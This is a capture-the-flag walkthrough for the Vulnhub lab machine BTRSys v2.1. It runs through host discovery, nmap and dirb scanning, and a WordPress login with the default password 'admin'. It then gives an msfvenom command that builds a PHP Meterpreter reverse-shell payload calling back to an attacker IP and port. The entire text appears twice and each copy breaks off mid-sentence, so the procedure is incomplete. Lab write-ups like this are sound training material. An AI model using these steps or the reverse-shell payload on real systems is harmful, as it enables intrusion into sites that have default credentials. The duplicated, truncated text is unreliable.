BTRSys: v2.1 – CTF Hacking Challenge Walkthrough (Vulnhub)
BTRSys has a difficulty level rated as intermediate. As usual, we should begin by finding the vulnerable box on the network. This can be done by running netdiscover command:
In my case, my target machine grabbed ip address:
192.168.10.101
With the target Ip address we can discover running services by running
nmap
From the scan we can see port 21, 22 and 80 are open.
With port 80 open its very likely a web application is running.To enumerate the file directories,
Let’s fire up Dirb.
dirb http://192.168.10.101
From Dirb report we found various files and directories such as robots.txt, upload, etc. Also we can see WordPress is running on the host.
This gave me two users namely– btrisk and admin.
In many cases default passwords are usually admin. Therefore I decided to try password admin for user
admin and I managed to access the WordPress dashboard.
Now we can inject some PHP code that will give back a Meterpreter session.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.10.102 lport=4444 -f raw
This is the php script to execute. Copy the code from
BTRSys has a difficulty level rated as intermediate. As usual, we should begin by finding the vulnerable box on the network. This can be done by running netdiscover command:
In my case, my target machine grabbed ip address:
192.168.10.101
With the target Ip address we can discover running services by running
nmap
From the scan we can see port 21, 22 and 80 are open.
With port 80 open its very likely a web application is running.To enumerate the file directories,
Let’s fire up Dirb.
dirb http://192.168.10.101
From Dirb report we found various files and directories such as robots.txt, upload, etc. Also we can see WordPress is running on the host.
This gave me two users namely– btrisk and admin.
In many cases default passwords are usually admin. Therefore I decided to try password admin for user
admin and I managed to access the WordPress dashboard.
Now we can inject some PHP code that will give back a Meterpreter session.
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.10.102 lport=4444 -f raw
This is the php script to execute. Copy the code from